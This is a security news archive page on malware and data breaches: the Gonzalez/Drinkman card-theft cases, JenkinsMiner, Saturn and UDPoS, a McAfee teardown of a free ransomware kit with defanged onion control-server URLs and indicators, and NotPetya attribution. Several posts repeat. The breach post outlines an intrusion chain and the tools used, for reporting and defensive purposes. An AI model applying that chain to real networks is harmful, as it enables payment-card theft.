Category Archives: Malware

Drinkman and Smilianets Sentenced: The End to Our Longest Databreach Saga?

On Thursday, February 15, 2018, we may have finally reached the end of the Albert Gonzalez Databreach Saga.  Vladimir Drinkman, age 37, was sentenced to 144 months in prison, after pleading guilty before U.S. District Judge Jerome Simandle in New Jersey.  His colleague, Dmitriy Smilianets, age 34, had also pleased guilty and was sentenced to 51 months and 21 days in prison (which is basically "time served", so he'll walk immediately).  The pair were actually arrested in the Netherlands on June 28, 2012, and the guilty pleas had happened in September 2015th after they were extradited to New Jersey.

Those who follow data breaches will certainly be familiar with Albert Gonzalez, but may not realize how far back his criminal career goes.

On July 24, 2003, the NYPD arrested Gonzalez in front of a Chase Bank ATM at 2219 Broadway found Gonzalez in possession of 15 counterfeit Chase ATM cards and $3,000 in cash. (See case 1:09-cr-00626-JBS).  After that arrest, Gonzalez was taken under the wing of a pair of Secret Service agents, David Esposito and Steve Ward.  Gonzalez describes some of the activities he engaged in during his time as a CI in his 53 page appeal that he files March 24, 2011 from his prison cell in Milan, Michigan.

At one point, he claims that he explained to Agent Ward that he owed a Russian criminal $5,000 and he couldn't afford to pay it.  According to his appeal, he claims Ward told him to "Go do your thing, just don't get caught" and that Agent Ward later asked him if he had "handled it." Because of this, Gonzalez (who again, according to his own sentencing memo, likely has Asperger's) claims he believed that he had permission to hack, as long as he didn't get caught.

Over Christmas 2007, Gonzalez and his crew hacked Heartland Payments Systems and stole around 130 million credit and debit cards.  He was also charged with hacking 7-Eleven (August 2007), Hannaford Brothers (November 2007) where he stole 4.2 million credit and debit cards. Two additional data breaches against "Company A" and "Company B" were also listed as victims.  In Gonzalez's indictment, it refers to "HACKER 1 who resided in or near Russia" and "HACKER 2 who resided in or near Russia."  Another co-conspirator "PT" was later identified as Patrick Toey, a resident of Virginia Beach, VA.  (Patrick Toey's sentencing memorandum is a fascinating document that describes his first "Cash out trip" working for Albert Gonzalez in 2003. Toey describes being a high school drop out who smoked marijuana and drank heavily who was "put on a bus to New York" by his mother to do the cash out run because she needed rent money.  Toey later moved in with Gonzalez in Miami, where he describes hacking Forever 21 "for Gonzalez" among other hacks.

Gonzalez's extracurricular activities caught up with him when Maksym Yastremskiy (AKA Maksik) was arrested in Turkey.  Another point of Gonzalez's appeal was to say that Maksik was tortured by Turkish police, and that without said torture, he never would have confessed, which would have meant that Gonzalez (then acting online as "Segvec") would never have been identified or arrested.  Gonzalez claims that he suffered from an inadequate defense, because his lawyer should have objected to the evidence "obtained under torture."  These charges against Gonzalez were tried in the Eastern District of New York (2:08-cr-00160-SJF-AKT) and proved that Gonzalez was part of the Dave & Buster's data breach

On December 15, 2009, Gonzalez tried to shrug off some of his federal charges by filing a sentencing memo claiming that he lacked the "capacity to knowingly evaluate the wrongfulness of his actions" and asserting that his criminal behavior "was consistent with description of the Asperger's discorder" and that he exhibited characteristics of "Internet addiction."  Two weeks later, after fighting that the court could not conduct their own psychological exam, Gonzalez signed a guilty plea, agreeing that the prosecutor would try to limit his sentence to 17 years. He is currently imprisoned in Yazoo, Mississippi (FBOP # 25702-050) scheduled to be released October 29, 2025.

Eventually "HACKER 1" and "HACKER 2" were indicted themselves in April 2012, with an arrest warrant issued in July 2012, but due to criminals still at large, the indictment was not unsealed until December 18, 2013. HACKER 1 was Drinkman.  HACKER 2 was Alexandr Kalinin, who was also indicted with Drinkman and Smilianets.

Shortly after the Target Data Breach, I created a presentation called "Target Data Breach: Lessons Learned" which drew heavily on the history of Drinkman and Smilianets. Some of their documented data breaches included:
VictimDateDamages
NASDAQMay 2007  loss of control
7-ELEVEN August 2007
Carrefour October 2007 2 million cards
JCPenneyOctober 2007
HannafordNovember 2007 4.2 million cards
Wet SealJanuary 2008
CommideaNovember 2008 30 million cards
Dexia Bank BelgiumFeb'08-Feb'09
Jet BlueJan'08 to Feb '11
Dow Jones2009
EuroNetJul '10 to Oct '11  2 million cards
Visa JordanFeb-Mar '11  800,000 cards
Global Payments SystemsJan '11 to Mar '12
Diners Club SingaporeJun '11
IngenicardMar '12 to Dec '12

During the time of these attacks, Dimitry Smilianets was also leading the video game world.  His team, The Moscow 5, were the "Intel Extreme Masters" champions in the first League of Legends championship, also placing in the CounterStrike category.   Smilianets turned out not to be the hacker, but rather specialized in selling the credit cards that the other team members stole.  Steal a few hundred million credit cards and you can buy a nice gaming rig!

Smilianets with his World Champion League of Legends team in 2012

 How did these databreaches work?


Lockheed Martin's famous paper "Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains" laid out the phases of an attack like this:

But my friend Daniel Clemens had explained these same phases to me when he was teaching me the basics of Penetration Testing years before when he was first starting Packet Ninjas!

1. External Recon - Gonzalez and his crew scan for Internet-facing SQL servers
2. Attack (Dan calls this "Establishing a Foothold") - using common SQL configuration weaknesses, they caused a set of additional tools to be downloaded from the Internet
3. Internal Recon - these tools included a Password Dumper, Password Cracker, Port Scanner,  and tools for bulk exporting data
4. Expand (Dan calls this "Creating a Stronghold")  - usually this consisted with monitoring the network until they found a Domain Admin userid and password.  (for example, in the Heartland Payments attack, the VERITAS userid was found to have the password "BACKUP" which unlocked every server on the network!
5. Dominate - Gonzalez' crew would then schedule an SQL script to run a nightly dump their card data
6. Exfiltrate - data sent to remote servers via an outbound FTP.

In Rolling Stone, Gonzalez claims he compromised more than 250 networks
In the Rolling Stone article, "Sex, Drugs, and the Biggest Cybercrime of All Time" , Steven Watt, who was charged in Massachusetts for providing attack tools to Gonzalez in October 2008.  Watt's tools were used in breaches, including BJ's Wholesale Club, Boston Market, Barnes & Noble, Sports Authority, Forever 21, DSW, and OfficeMax.  As part of his sentencing, Watt was ordered to repay $171.5 Million dollars.

Almost all of those databreaches followed the same model ... scan, SQL Inject, download tools, plant a foothold, convert it to a stronghold by becoming a domain admin, dominate the network, and exfiltrate the data. 

How did the TARGET Data breach happen, by the way?  Target is still listed as being "Unsolved" ...   but let's review.  An SQL injection led to downloaded tools, (including NetCat, PSExec, QuarksPWDump, ElcomSoft's Proactive Password Auditor, SomarSoft's DumpSec, Angry IP Scanner (for finding database servers), and Microsoft's OSQL and BCP (Bulk Copy)), a Domain Admin password was found (in Target's case, a BMC server monitoring tool running the default password), the POS Malware was installed, and data exfiltration begun. 

Sound familiar???

Justice?

With most of Gonzalez's crew in prison by 2010, the data breaches kept right on coming, thanks to Drinkman and Smilianets. 

Drinkman, the hacker, was sentenced to 144 months in prison.
Smilianets, the card broker, was sentenced to 51 months and 21 days, which was basically "time served" -- he was extradited to the US on September 7, 2012, so he'll basically walk.

Will Smilianets return to video gaming? to money laundering? or perhaps choose to go straight?

Meanwhile, Alexandr Kalinin, of St. Petersburg, Russia; Mikhail Rytikov, of Odessa, Ukraine; and Roman Kotov, of Moscow, Russia, are all still at large.  Have they learned from the fate of their co-conspirators? or are they in all likelihood, scanning networks for SQL servers, injecting them, dropping tools, planting footholds, creating strongholds, and exfiltrating credit card data from American companies every day?

Kalinin (AKA Grig, AKA "g", AKA "tempo") is wanted for hacking NASDAQ and planting malware that ran on the NASDAQ networks from 2008 to 2010.  (See the indictment in the Southern District of New York, filed 24JUL2013 ==> 1:13-cr-00548-ALC )

Mykhailo Sergiyovych Rytikov is wanted in the Western District of Pennsylvania for his role in a major Zeus malware case.  Rytikov leased servers to other malware operators.  Rytikov is also indicted in the Eastern District of Virginia along with Andriy DERKACH for running a "Dumps Checking Service" that processed at least 1.8 million credit cards in the first half of 2009 and that directly led to more than $12M in fraud.  ( 1:12-cr-00522-AJT filed 08AUG2013.)  Rytikov did have a New York attorney presenting a defense in the case -- Arkady Bukh argues that while Rytikov is definitely involved in web-hosting, he isn't responsible for what happens on the websites he hosts.

Roman Kotov, and Rytikov and Kalinin, are still wanted in New Jersey as part of the case 1:09-cr-00626-JBS (Chief Judge Jerome B. Simandle ). This is the same case Drinkman and Smilianets were just sentenced under.

JenkinsMiner made $3.4 million in a few months by compromising Jenkins servers

Hacker Group Makes $3 Million by Installing Monero Miners on Jenkins Servers

A criminal organization has made $3.4 million by compromising Jenkins servers and installing a Monero cryptocurrency miner dubbed JenkinsMiner.

“The perpetrator, allegedly of Chinese origin, has been running the XMRig miner on many versions of Windows, and has already secured him over $3 million worth of Monero crypto-currency. As if that wasn’t enough though, he has now upped his game by targeting the powerful Jenkins CI server, giving him the capacity to generate even more coins.” states a blog post published by CheckPoint.

Jenkins is the most popular open source automation server, it is maintained by CloudBees and the Jenkins community.

The automation server supports developers build, test and deploy their applications, it has more than 133,000 active installations worldwide with more than 1 million users.

Jenkins servers

According to the researchers, threat actors behind the massive mining operation were leveraging the CVE-2017-1000353 RCE vulnerability in the Jenkins Java deserialization implementation.

The vulnerability is due to lack of validation of the serialized object, its exploitation allowed the attackers to make Jenkins servers download and install the JenkinsMiner.

“The operation uses a hybridization of a Remote Access Trojan (RAT) and XMRig miner over the past months to target victims around the globe. The miner is capable of running on many platforms and Windows versions, and it seems like most of the victims so far are personal computers. With every campaign, the malware has gone through several updates and the mining pool used to transfer the profits is also changed.” continues the post.

Most of the downloads for the JenkinsMiner are from IP address located in China and assigned to the Huaian government information center, of course, we are not able to determine if the server was compromised or explicitly used by state-sponsored hackers.

Jenkinminer

Further details and IoCs are included in the analysis published by CheckPoint.

In January, security expert Mikail Tunç analyzed Jenkins servers exposed online discovering that many instances leak sensitive information.

Tunç highlighted that Jenkins typically requires credentials to the code repository and access to an environment in which to deploy the code, usually GitHub, AWS, and Azure. Failure to configure the application correctly can expose data to serious risk.

The researcher discovered that many misconfigured systems provided guest or administrator permissions by default, while others allowed guest or admin access to anyone who registered an account.

Pierluigi Paganini

(Security Affairs – JenkinsMiner, Monero cryptocurrency miner)

The post JenkinsMiner made $3.4 million in a few months by compromising Jenkins servers appeared first on Security Affairs.

Security Affairs: JenkinsMiner made $3.4 million in a few months by compromising Jenkins servers

Hacker Group Makes $3 Million by Installing Monero Miners on Jenkins Servers

A criminal organization has made $3.4 million by compromising Jenkins servers and installing a Monero cryptocurrency miner dubbed JenkinsMiner.

“The perpetrator, allegedly of Chinese origin, has been running the XMRig miner on many versions of Windows, and has already secured him over $3 million worth of Monero crypto-currency. As if that wasn’t enough though, he has now upped his game by targeting the powerful Jenkins CI server, giving him the capacity to generate even more coins.” states a blog post published by CheckPoint.

Jenkins is the most popular open source automation server, it is maintained by CloudBees and the Jenkins community.

The automation server supports developers build, test and deploy their applications, it has more than 133,000 active installations worldwide with more than 1 million users.

Jenkins servers

According to the researchers, threat actors behind the massive mining operation were leveraging the CVE-2017-1000353 RCE vulnerability in the Jenkins Java deserialization implementation.

The vulnerability is due to lack of validation of the serialized object, its exploitation allowed the attackers to make Jenkins servers download and install the JenkinsMiner.

“The operation uses a hybridization of a Remote Access Trojan (RAT) and XMRig miner over the past months to target victims around the globe. The miner is capable of running on many platforms and Windows versions, and it seems like most of the victims so far are personal computers. With every campaign, the malware has gone through several updates and the mining pool used to transfer the profits is also changed.” continues the post.

Most of the downloads for the JenkinsMiner are from IP address located in China and assigned to the Huaian government information center, of course, we are not able to determine if the server was compromised or explicitly used by state-sponsored hackers.

Jenkinminer

Further details and IoCs are included in the analysis published by CheckPoint.

In January, security expert Mikail Tunç analyzed Jenkins servers exposed online discovering that many instances leak sensitive information.

Tunç highlighted that Jenkins typically requires credentials to the code repository and access to an environment in which to deploy the code, usually GitHub, AWS, and Azure. Failure to configure the application correctly can expose data to serious risk.

The researcher discovered that many misconfigured systems provided guest or administrator permissions by default, while others allowed guest or admin access to anyone who registered an account.

Pierluigi Paganini

(Security Affairs – JenkinsMiner, Monero cryptocurrency miner)

The post JenkinsMiner made $3.4 million in a few months by compromising Jenkins servers appeared first on Security Affairs.



Security Affairs

Security Affairs: Researchers spotted a new malware in the wild, the Saturn Ransomware

Researchers at the MalwareHunterTeam spotted a new strain of ransomware called Saturn Ransomware, the name derives from the .saturn extension it appends to the name of the encrypted files.

Currently, the malware requests victims of $300 USD payment that doubles after 7 days.

Once infected a system, the Saturn Ransomware checks if it is running in a virtual environment and eventually it halts the execution to avoid being analyzed by researchers.

Then it performs a series of actions to make impossible for the victims restoring the encrypted files, it deletes shadow volume copies, disables Windows startup repair, and to clear the Windows backup catalog.

Below the command executed by the malicious code:


At this point, the Saturn ransomware is ready to encrypt files having certain file types.

The ransomware such as many other threats uses a Tor payment site that is reported in the ransom note dropped on the machine while the Saturn ransomware is encrypting the files.

“While encrypting the computer, Saturn Ransomware will drop ransom notes named #DECRYPT_MY_FILES#.html and #DECRYPT_MY_FILES#.txt and a key file named #KEY-[id].KEY in each folder that it encrypts a file. The key file is used to login to the TOR ransom site, while the ransom note contains brief information on what has happened to the victims files and a link to the TOR payment site at su34pwhpcafeiztt.onion.” wrote Larwrence Abrams from Bleeping Computer.

Saturn Ransomware

File encrypted by the Saturn Ransomware (Source Bleeping computer)

The Saturn ransomware also drops a #DECRYPT_MY_FILES#.vbs triggers an audio message to the victims, and it sets your Windows desktop background to  #DECRYPT_MY_FILES.BMP.

The authentication to TOR site is made by uploading the key file, then users will display the Saturn Decryptor page for the victim that includes detailed instructions.

Researchers are still analyzing the Saturn ransomware, even if it is being actively distributed, it is still unclear what distribution vector threat actors are using to spread it.

Further information, including the Indicators of compromise (IoCs), are available in the blog post published by Bleeping Computer.

Pierluigi Paganini

(Security Affairs – Saturn, cybercrime)

The post Researchers spotted a new malware in the wild, the Saturn Ransomware appeared first on Security Affairs.



Security Affairs

Researchers spotted a new malware in the wild, the Saturn Ransomware

Researchers at the MalwareHunterTeam spotted a new strain of ransomware called Saturn Ransomware, the name derives from the .saturn extension it appends to the name of the encrypted files.

Currently, the malware requests victims of $300 USD payment that doubles after 7 days.

Once infected a system, the Saturn Ransomware checks if it is running in a virtual environment and eventually it halts the execution to avoid being analyzed by researchers.

Then it performs a series of actions to make impossible for the victims restoring the encrypted files, it deletes shadow volume copies, disables Windows startup repair, and to clear the Windows backup catalog.

Below the command executed by the malicious code:


At this point, the Saturn ransomware is ready to encrypt files having certain file types.

The ransomware such as many other threats uses a Tor payment site that is reported in the ransom note dropped on the machine while the Saturn ransomware is encrypting the files.

“While encrypting the computer, Saturn Ransomware will drop ransom notes named #DECRYPT_MY_FILES#.html and #DECRYPT_MY_FILES#.txt and a key file named #KEY-[id].KEY in each folder that it encrypts a file. The key file is used to login to the TOR ransom site, while the ransom note contains brief information on what has happened to the victims files and a link to the TOR payment site at su34pwhpcafeiztt.onion.” wrote Larwrence Abrams from Bleeping Computer.

Saturn Ransomware

File encrypted by the Saturn Ransomware (Source Bleeping computer)

The Saturn ransomware also drops a #DECRYPT_MY_FILES#.vbs triggers an audio message to the victims, and it sets your Windows desktop background to  #DECRYPT_MY_FILES.BMP.

The authentication to TOR site is made by uploading the key file, then users will display the Saturn Decryptor page for the victim that includes detailed instructions.

Researchers are still analyzing the Saturn ransomware, even if it is being actively distributed, it is still unclear what distribution vector threat actors are using to spread it.

Further information, including the Indicators of compromise (IoCs), are available in the blog post published by Bleeping Computer.

Pierluigi Paganini

(Security Affairs – Saturn, cybercrime)

The post Researchers spotted a new malware in the wild, the Saturn Ransomware appeared first on Security Affairs.

McAfee Blogs: Inside the Capabilities and Detection of UDPoS Malware

Imagine a job that changes every day of your life, where you get to do something new each week – that’s what it’s like working in the cybersecurity industry. For me, this is ideal—smarter adversaries, new challenges, and the constant struggle to predict and prepare for the future of security in information technology makes this feel a lot less like work. However, it’s important to remember that we do this only because people are getting hurt, often literally. And that’s a sobering and humbling perspective. In many scenarios, a successful campaign can have drastic effects on the victims’ lifestyles and finances. In today’s example, the victims, point-of-sale systems, are being attacked by a POS malware and are being targeted for identity and financial theft.

This particular attack leveraged a POS malware dubbed UDPoS, aptly named for its somewhat uncommon data exfiltration method over UDP, specifically via DNS queries. Although this malware is definitely not the first of its kind (see Multigrain POS malware, DNSMessenger), it certainly is an uncommon technique, and intelligent in that many organizations deprioritize DNS traffic for inspection as compared to HTTP and FTP. Coupled with the fact that UDPoS allegedly leverages a popular remote desktop service known as LogMeIn, and you have a malware campaign that could have a broad reach of victims (in this case unpatched or dated POS systems), and a unique ability to avoid detection for data exfiltration.

Although uncommon, and perhaps somewhat covert in its ability to transmit data over DNS, this malware does offer an upside for defenders — attackers will continue to use protocols which do not employ encryption. The move to SSL or other encryption methods for data exfiltration has been surprisingly inconsistent, meaning detection is relatively simple. This makes the need for communication and visibility of these kinds of techniques essential.

As defenders, McAfee’s Advanced Threat Research team actively monitors the threat landscape and tracks both new and current techniques for every stage of malware—from reconnaissance to infection, lateral movement, persistence, command and control, and exfiltration. We will stay closely tuned to determine if this technique grows in popularity or evolves in capabilities.

We are constantly playing a game of cat and mouse with the adversaries. As we adapt, protect, and attempt to predict new methods of malicious activity, we can be certain the same efforts are being made to evade and outsmart us. Our challenge as a security community is to work together, learn from each other, and apply these learnings toward recognizing and mitigating new threats, such as the DNS exfiltration method employed by UDPoS.

To learn more about UDPoS malware and others like it, be sure to follow @McAfee and @McAfee_Labs on Twitter.

The post Inside the Capabilities and Detection of UDPoS Malware appeared first on McAfee Blogs.



McAfee Blogs

Inside the Capabilities and Detection of UDPoS Malware

Imagine a job that changes every day of your life, where you get to do something new each week – that’s what it’s like working in the cybersecurity industry. For me, this is ideal—smarter adversaries, new challenges, and the constant struggle to predict and prepare for the future of security in information technology makes this feel a lot less like work. However, it’s important to remember that we do this only because people are getting hurt, often literally. And that’s a sobering and humbling perspective. In many scenarios, a successful campaign can have drastic effects on the victims’ lifestyles and finances. In today’s example, the victims, point-of-sale systems, are being attacked by a POS malware and are being targeted for identity and financial theft.

This particular attack leveraged a POS malware dubbed UDPoS, aptly named for its somewhat uncommon data exfiltration method over UDP, specifically via DNS queries. Although this malware is definitely not the first of its kind (see Multigrain POS malware, DNSMessenger), it certainly is an uncommon technique, and intelligent in that many organizations deprioritize DNS traffic for inspection as compared to HTTP and FTP. Coupled with the fact that UDPoS allegedly leverages a popular remote desktop service known as LogMeIn, and you have a malware campaign that could have a broad reach of victims (in this case unpatched or dated POS systems), and a unique ability to avoid detection for data exfiltration.

Although uncommon, and perhaps somewhat covert in its ability to transmit data over DNS, this malware does offer an upside for defenders — attackers will continue to use protocols which do not employ encryption. The move to SSL or other encryption methods for data exfiltration has been surprisingly inconsistent, meaning detection is relatively simple. This makes the need for communication and visibility of these kinds of techniques essential.

As defenders, McAfee’s Advanced Threat Research team actively monitors the threat landscape and tracks both new and current techniques for every stage of malware—from reconnaissance to infection, lateral movement, persistence, command and control, and exfiltration. We will stay closely tuned to determine if this technique grows in popularity or evolves in capabilities.

We are constantly playing a game of cat and mouse with the adversaries. As we adapt, protect, and attempt to predict new methods of malicious activity, we can be certain the same efforts are being made to evade and outsmart us. Our challenge as a security community is to work together, learn from each other, and apply these learnings toward recognizing and mitigating new threats, such as the DNS exfiltration method employed by UDPoS.

To learn more about UDPoS malware and others like it, be sure to follow @McAfee and @McAfee_Labs on Twitter.

The post Inside the Capabilities and Detection of UDPoS Malware appeared first on McAfee Blogs.

NIST Floats Internet of Things Cybersecurity Standards

There are plenty of standards that can be used to help secure The Internet of Things, but not much evidence that they’re being used, according to NIST, which calls on government and industry to settle on conforming standards for IoT products in a new report.  That National Institute of Standards and Technology (NIST) has unveiled guidelines...

Read the whole entry... »

Related Stories

Free Ransomware Available on Dark Web

The McAfee Advanced Threat Research team recently analyzed a ransomware-as-a-service threat that is available for free and without registration. This malware was first seen in July 2017 with the extension .shifr. It has now appeared in recent detections with the extension .cypher.

Ransomware-as-a-Service

Ransomware-as-a-service is a cybercrime economic model that allows malware developers to earn money for their creations without the need to distribute their threats. Nontechnical criminals buy their wares and launch the infections, while paying the developers a percentage of their take. The developers run relatively few risks, and their customers do most of the work.

Some ransomware-as-a-service, such as RaaSberry, use subscriptions while others require registration to gain access to the ransomware. The ransomware developer hosts a service on the “dark web” that allows any buyer to create and modify the malware. For example, the buyer can add custom ransom notes and the amount of the payment. More advanced services offer features such as evasion techniques to avoid detection and analysis. The service can also offer a control server with an administration panel to manage each victim. This system is convenient for both the developer, who makes money by selling malware, and for buyers, who gain ready-to-deploy ransomware without needing any specific coding knowledge.

The underground economy behind this service is well organized, effectively offering a cybercrime infrastructure. Basically, the ransomware is available on a website. The buyer sets up the ransomware by adding a wallet address. The ransomware is then available to download. The buyer just needs to customize and spread the malware. When a victim pays the ransom, a percentage is delivered both to the buyer and to the malware coder.

 

The ransomware is available on the TOR network at hxxp://kdvm5fd6tn6jsbwh.onion. A web page guides buyers through the configuration process.

On the configuration page, a generic XMPP address suggests we may have found a demo version of the ransomware.

On the page, the buyer need only to add a Bitcoin wallet address and the amount of the ransom. Once that is done, the malware is generated and can be downloaded. With this malware, the developer earns a 10% commission on every payment. Now let’s look at the malware sample.

Dynamic Analysis 

When the malware launches on the victim’s system, it checks for an Internet connection. If there is none, it exits the process. Otherwise, it contacts the following addresses to download the encryption key:

Once the file is running, it creates several files on the system:

  • Encryption_key: the RSA key encrypted in AES
  • Lock_file: an indicator that the system is encrypted
  • Uuid_file: a reference for the infected machine. A TOR address is generated with this ID.

The encryption key is downloaded from hxxps://kdvm5fd6tn6jsbwh.onion.to/new_c/xmKksHw53W433lmvNsdzGxqWLcPLA44Dyna.

The ransom note is created on the desktop.

The file “HOW_TO_DECRYPT_FILES.html” gives a link to the TOR network.

Once the files are encrypted, the ransom note is displayed in HTML and points to the TOR site hxxp://kdvm5fd6tn6jsbwh.onion/ with the ID of the infected machine.

Allegedly after payment, the victim can download the file decrypter.exe and unlock encrypted files, which have the extension .cypher.

The malware encrypts the following file extensions:

The targeted extensions include many picture and photography files related to Canon, Kodak, Sony, and others. There are also extensions for AutoCAD, Autodesk projects, scalable vector images, and Microsoft Office files. These files are mostly used by designers, photographers, architect—and many others.

Digging Deeper

The malware runs on 64-bit systems and is coded in Golang (“Go language,” from Google), a programming language similar to C with some improvements in error management. It is not common to find malware using Golang, although this is not the first time that we have analyzed such malware. This threat is pretty big compared with most other malware, larger than 5.5MB. The file size can make analysis more difficult and can also help evade hardcoded antimalware file-inspection sizes.

Reverse engineering in Golang is a bit different than other languages. Golang binaries are usually bigger than other executables. (By default, the compiler statically links the program’s libraries, resulting a bigger file.)

A drawback for attackers is that such big binaries can be easily detected on a corporate network. Large files are “noisier” and may appear suspicious when arriving from an external source. They can also be less convenient for attackers to deal with because they can make the infection process more difficult.

The first interesting function to analyze in a Golang binary is the “main_main.” The malware starts by gathering environment variables. It then checks whether the file “lock_file” exists in the directory C:\Users\<username>\AppData\Roaming.

The function “main_Exists” will check for the file. If it does not exist, the malware exits the process.

If the file does exist, the malware downloads the public key from the control server.

The malware contacts the address  hxxps://kdvm5fd6tn6jsbwh.onion/new_c/<nameofmalware>. The encryption public key is stored directly on the website.

This address is generated when the buyer creates the ransomware on the developer’s web page; thus the same malware encrypts files with the same public key.

The malware generates the AES key and tries to find any network share by querying the letters.

This function tries to find network shares:

Before a file is encrypted, the malware creates another file in C:\Users\<username>\AppData\Roaming\uuid_file to use as a victim identifier.

The malware encrypts the files using AES and deletes them after encryption with the function “os.remove” to avoid any simple forensic recovery.

The decrypter, which can be downloaded, works in a similar way but it requests the private key that the victims must pay for at hxxps://kdvm5fd6tn6jsbwh.onion.to/get_privkey/math/big. The mechanism behind the encryption routine seems to be on the online server and the decryption key cannot be easily recovered.

The following information describes the decrypter.

Conclusion

Cybercrime-as-a-service is not new, yet it is now more widespread than ever. In this case, the malware is available for free but the ransomware developer earns a 10% fee from each victim who pays a ransom. The use of Golang is not common for malware. Most ransomware-as-a-service is not free, which could indicate this might be a demonstration version, or a proof of concept for future sale.

This malware is not advanced and was coded without evasion techniques, such as DGA, SSL for control, encryption, or even file compression. Looking at the targeted file extensions suggests the victims can range from general home or business users to the graphics industry. Although such malware is not difficult to analyze, it can be very destructive in a corporate environment.

Keep in mind that paying a ransom is no guarantee of receiving a decryption key. McAfee advises that you never pay a ransom. You can find further information and help on unlocking some ransomware threats at https://www.nomoreransom.org.

McAfee detects this threat as Ransomware-FPDS!0F8CCEE515B8.

 

Indicators of Compromise

Hashes:

  • cb73927aa749f88134ab7874b15df898c014a35d519469f59b1c85d32fa69357
  • 0622fcb172773d8939b451c43902095b0f91877ae05e562c60d0ca0c237a2e9c

IP address:

  • hxxp://kdvm5fd6tn6jsbwh.onion

Files created:

  • C:\Users\<username>\AppData\Roaming\uuid_file
  • C:\Users\<username>\AppData\Roaming\lock_file
  • C:\Users\<username>\AppData\Roaming\encryption_key
  • C:\Users\< username >\Desktop\HOW_TO_DECRYPT_FILES.html

Encryption extension:

  • .cypher

References:

https://www.virustotal.com/en/file/0622fcb172773d8939b451c43902095b0f91877ae05e562c60d0ca0c237a2e9c/analysis/

https://isc.sans.edu/forums/diary/Ransomware+as+a+Service/23277/

 

The post Free Ransomware Available on Dark Web appeared first on McAfee Blogs.

The State of Ransomware: Attacks Up, Payments Down as Firms Fight Back

Ransomware isn’t going away. As noted by Infosecurity Magazine, European small and midsize businesses (SMBs) paid out almost $100 million last year to recover encrypted files. Meanwhile, Malwarebytes tracked a 90 percent increase in the number of detected ransomware attacks.

But it’s not all bad news. According to a new report from Datto, the state of ransomware is shifting. More companies are reporting attacks and fewer are paying ransoms. It’s a standoff: Ransomware-makers are doubling down on new attacks even as enterprises push back on payment.

The Current State of Ransomware

The Datto report pointed out that 4.5 percent of European SMBs fell victim to malware between 2016 and 2017. More telling, 78 percent said they experienced “business-threatening downtime” because of these attacks. Meanwhile, 97 percent of respondents said that ransomware attacks were on the rise, with 22 percent reporting multiple attacks in a single day.

What’s more, attackers are both persistent and pernicious. Eleven percent of SMBs said persistent ransomware was used to attack systems more than once, while 31 percent reported that ransomware also infected backups, making the road to remediation much more difficult. Given these startling numbers, it’s easy to see why the current state of ransomware has companies concerned.

Breaking the Feedback Loop of Fear

The ramp up of ransomware threats has created a kind of feedback-loop culture. Companies know that they shouldn’t pay the ransom and should report the attack, but standard operating procedure has become the opposite: Pay quickly to decrypt files and keep the breach under wraps.

As noted by the Datto report, however, attitudes are changing. More businesses are now reporting attacks to authorities and supplying them with relevant data, while just 21 percent of SMBs opted to pay the ransom in 2017. That’s a solid choice, since 18 percent of firms that came up with the cash didn’t get their data back.

So what’s the best way to push back and put enterprises ahead of malware-makers? It starts with recognizing origin points. According to Tech Republic, the root causes of most successful ransomware infections are user error and phishing attacks. Basic security hygiene, solid antivirus solutions and robust security training go a long way toward taking the bite out of ransomware threats.

Meanwhile, security firms are actively researching ransomware decryption tools, ZDNet reported. The Belgian National Police and Kaspersky Lab recently released a free solution for the prolific Cryakl ransomware strain.

The biggest shift, however, comes at a corporate level. Given the ability of ransomware threats to infect any operating system and any platform at any time, organizations often take on the mantle of helpless victim inevitably compromised by bad actors.

As a result, the threat of ransomware becomes just as terrifying as the infection itself, forcing employees and IT professionals into an infinite loop of fear and frustration. With the rise of reporting, proven effectiveness of basic security training and ongoing work by security experts, however, the state of ransomware becomes a driving force for security adaptation rather than harbinger of IT apocalypse.

The post The State of Ransomware: Attacks Up, Payments Down as Firms Fight Back appeared first on Security Intelligence.

The importance of an integrated security strategy

Integrated security strategies with complementary solutions are more effective than multiple layers of complex protection software One of the biggest challenges facing the security industry is joined-up thinking. With so

The post The importance of an integrated security strategy appeared first on The Cyber Security Place.

Why the cyber threat landscape could grow under GDPR

The General Data Protection Regulation (GDPR) is only 3 short months away, with the incoming regulation seeing businesses across Europe and beyond bolster their cyber security in an effort to

The post Why the cyber threat landscape could grow under GDPR appeared first on The Cyber Security Place.

2 Billion Files Leaked in US Data Breaches in 2017

Nearly 2 billion files containing the personal data of US citizens were leaked last year—and that number could be significantly underreported.In 2017, a total of 551 breaches affected organizations, with

The post 2 Billion Files Leaked in US Data Breaches in 2017 appeared first on The Cyber Security Place.

SecurityWeek RSS Feed: U.S., Canada, Australia Attribute NotPetya Attack to Russia

The United States, Canada, Australia and New Zealand have joined the United Kingdom in officially blaming Russia for the destructive NotPetya attack launched last summer. Moscow has denied the accusations.

read more



SecurityWeek RSS Feed

NBlog February 16 – innovative malawareness

Malware has been a concern since the 1980’s. It’s an awareness topic we update and refresh every March, and yet we never fail to find something new to discuss. 

Last year, we focused on ransomware, a ‘real and present danger’ at the time with several high-profile organizations (such as the UK National Health Service) suffering disruptive and very costly incidents.
 
This year, surprisingly, the ransomware risk appears to have declined according to some reports, only to be replaced it seems by the next wave: cryptocurrency mining Trojans.

Meanwhile, we suspect reports of the demise of ransomware are premature. Compared to slowly milking a few Bitcoins from a large botnet of cryptominers, holding organizations’ or indeed individuals’ data to ransom for a few hundred dollars or more per hit seems much more lucrative – but also riskier for the criminals behind the scams. 

Perhaps what's really behind this is the criminals’ risk-reward tradeoff. 

Then again, maybe it's just that the analysis is flawed. Perhaps ransomware was not quite as bad as it seemed last March, and remains at much the same level today. 

One of the perennial issues we face in researching the malware topic is that the most readily available information is published by antivirus companies, with an obvious commercial agenda to make the malware issue appear worse than it really is. Sifting through the stream of "surveys" and "reports" to find the few of any note and credibility is a tedious task, making this one of those areas where our security awareness service goes beyond the bare minimum. Rather than regurgitating the same old stuff and scaremongering, we're adding value by researching information risks and challenging the conventional wisdom.  Innovating, you could say, or being unconventionally wise.

What the UK Knows: Five Things That Link NotPetya to Russia

The UK’s Foreign Office Minister Lord Ahmad said that the UK Government believes Russia was responsible for the destructive NotPetya cyber-attack of June 2017. How can they be sure? We look at five, strong clues pointing back to the Kremlin. The government of the United Kingdom has formally attributed the June 2017 NotPetya wiper attacks to...

Read the whole entry... »

Related Stories

UK government officially blames Russia for NotPetya attack

